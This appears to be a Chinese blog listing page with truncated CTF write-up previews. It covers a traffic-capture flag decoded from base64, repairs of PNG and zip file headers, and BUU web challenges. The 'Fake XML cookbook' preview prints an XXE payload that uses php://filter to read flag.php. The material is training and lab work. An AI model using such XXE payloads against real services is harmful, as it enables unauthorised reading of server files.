新疆高校大学生信息安全大赛WP
就是一个压缩包,里面有个流量包,追踪TCP流,有关键的一行
1(.Z.m.x.h.Z.3.t.i.c.2.N.6.c.z.F.6.Y.3.h.9.......................
去掉闲杂符号:
1ZmxhZ3tic2N6czF6Y3h9
base64解密:
1flag{bsczs1zcx}
Misceasyimage打开压缩包,里面是个png文件,010打开,文件头一团糟,按照格式修复它
参考下面的链接
【CTF杂项】常见文件文件头文件尾格式总结及各类文件头_iqiqiya的博客-CSDN博客_gif文件头
Bugku-CTF加密篇之zip伪加密(flag.zip) - 0yst3r - 博客园 (cnblogs.com)
1234560000h: 50 89->89 50B150h: 03 04->50 4B 03 04B150h: 14 03->14 00B1E0h: 3F 03->3F 00B1E0h: 14 03->14 00B230h: 05 06->50 4B 05 06
之后binwalk分 ...
Buu-web第二页
Fake-XML-cookbook1、概览题目打开题目看到一个登录框,结合题目Fake XML cookbook,查找Xml有关的知识点
CTF中关于XXE(XML外部实体注入)题目两道 - TQing - 博客园 (cnblogs.com)
将上述链接的例子研究过后,发现可以利用全局定义的实体进行将伪协议利用实体解析执行的一个效果
1234567891011<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"> ]><user> <username> &xxe; </username> <password> admin </password></user&g ...
BUU-web第一页
[HCTF 2018]WarmUp1、查看隐藏页面F12打开可以看到source.php页面,打开可以看到php代码
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849<?php highlight_file(__FILE__); class emm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it&quo ...